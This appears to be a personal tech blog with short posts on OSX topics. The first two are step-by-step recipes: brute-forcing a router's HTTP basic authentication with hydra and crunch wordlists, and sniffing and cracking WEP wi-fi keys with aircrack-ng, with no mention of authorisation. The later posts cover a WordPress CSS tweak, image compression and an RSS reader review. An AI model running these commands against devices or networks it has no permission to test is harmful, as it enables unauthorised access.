Bruteforcing Http Auth on OSX

password-cracking

Suppose you forgot the password of your router. What can you do?…. should you just reset the device?.
Nahhhh…. that’s boring. That’s why we’re gonna try to bruteforce http basic authentication.

We’re assuming that you run some incarnation of OSX, and you have Mac Ports installed. Right?.
We’ll need to download hydra… a bruteforce tool… so… fire up a terminal, and type the following:

sudo port install hydra

So far so good. Now, we’re gonna need to create our own password list. In order to do so, we’ll rely on crunch. It’s a nice shell tool, that builds on OSX as well. Download it here first. If you get any troubles building it, try typing:

gcc crunch.c -o crunch

For some reason, the makefile isn’t working… so i just built it right away with gcc.

Allright! we’ve got all what we need. Now, let’s suppose we wanna generate passwords with 5 characters length, including lowercase, uppercase and numbers. So… we should fire up our terminal, and type this:

[code]./crunch 5 5 -f charset.lst mixalpha-numeric -o wordlist.txt[/code]

Beware. That will take about 5 GB of space of your storage. Okay, okay. We’re almost there. Now, it’s time to try hydra. Try the following syntax:

hydra -l admin -P wordlist.txt -vV -s 80 HOSTNAME http-get /

Of course. We need the username, in this example we assume it’s ‘admin’. And we also assume that we’re hitting port 80.
Good luck!

Running airmon-ng in mountain lion!

aircrack-ngFor those of you who have no clue what is all of this about, Aircrack-ng is a command line tool that allows you to bruteforce WEP and WPA wi-fi password protections.

WEP being the easiest protection to break, and WPA the hardest. The difference?. WEP can be broken in… two days, give or take (probably less than that), while WPA could take months… without results!. Personally, everytime i needed to break a WEP protection, i had to boot a linux system. If you’re like me, and you’d rather staying in OSX, this is juuuuust for you.

I don’t wanna forget about this, so i’m writing this short guide, right here!

  1. Install Macports.
  2. Install aircrack-ng:
    sudo port install aircrack-ng
  3. Install the latest Xcode, with the Command Line Tools.
  4. Create the following symlink:
    sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport
  5. Figure out which channel you need to sniff:
    sudo airport -s
  6. Open up a terminal and type:
    sudo airport en1 sniff [CHANNEL]
  7. Open up a seecond terminal and type:
    aircrack-ng -1 -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]

Notes: the cap_file will be located in the /tmp/airportSniff*.cap.
Nice, right?

===========================
Update:

I’ve been having issues while trying to crack a WEP key. I had over 100k IV’s… without luck. So i’ve attepted to crack the key with the KoreK algorithm (coded in aircrack-ng). And guess what!! i got the key!!. If you ever have the same problem, try this:

aircrack-ng -K -a 1 -b [TARGET_MAC_ADDRESS] [CAP_FILE]

Optimizing TwentyEleven for Adsense

Well… this one is pretty descriptive. You simply need to edit the file ‘style.css’, and update the following code:

.one-column #page {
   max-width: 960px;
/*    max-width: 690px; */
}

You’re also probably gonna need to set the Default Layout to ‘One Column’, and remove the right side widgets.

That way, Adsense’s best size (728×90) will fit riiight above or below every post. Which makes it look nice, i dare to say!.

Make your Website load Faster!

I had to optimize a website, a couple days ago. My goal was to lower the time required to load the website. So… i spent quite some time doing a quick research… and found this awesome tool, which by the way is free!.

Screen Shot 2013-01-21 at 11.08.54 AM

It’s called ImageOptim. You simply drag & drop the assets you’d like to compress, and the guy will do the rest. I’ve been able to compress most of the images i’ve got, to 50% of their original size.

So now… my websites load super fast. If you’re running Windows (or Linux)… you could try ImageMagick. Which, by the way, is excellent as well.

App Review: Reeder

I’ve tried several RSS Readers for Mac. Many of them are free… such as Google Reader, or Capuccino. But a couple weeks ago i sumbled upon Reeder. I dare to say… it’s the best RSS Reader you’ll be able to find, anywhere else.

Why is that?. Well, the UI is pretty awesome… take a look:

reeder

Reeder has several UI styles. Personally, i use the layout portraited above. You get your feed list on the left… the posts in the middle, and the actual post on the right.

Now here’s something interesting. If you click over a post, the app hides the Feed List, and automatically enhances the post itself. Reeder has also something super cool. It’s Gestures-Enabled, which means that you can just swipe to the left or right, and trigger several actions (of course, you can configure that).

Most important of all… you can connect Reeder to your Google Reader account, and that’s it, this guy is gonna keep everything in sync. You could run it across several OSX installations, and… everything will be in sync.

I know it ** might ** be a bit expensive, for a simple rss reader. But trust me, this ain’t no simple reader.. and i believe it’s totally worth it!.